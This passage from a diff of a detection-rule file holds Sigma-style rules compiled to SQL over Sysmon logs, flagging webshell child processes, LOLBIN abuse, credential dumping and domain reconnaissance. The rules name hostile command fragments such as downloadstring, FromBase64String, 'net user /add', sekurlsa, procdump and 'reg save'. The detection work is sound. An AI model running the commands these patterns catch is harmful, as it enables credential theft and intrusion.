exfiltration activities on a compromised system", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ], "falsepositives": [ - "Unlikely" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", - "author": "frack113", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.005" + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "title": "Capture Credentials with Rpcping.exe", + "id": "93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", - "author": "frack113", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_attrib_hiding_files.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "title": "Dumping Process via Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], - "level": "high", + "falsepositives": [ + "Legitimate MSSQL Server actions" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate uses of logon scripts distributed via group policy" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR 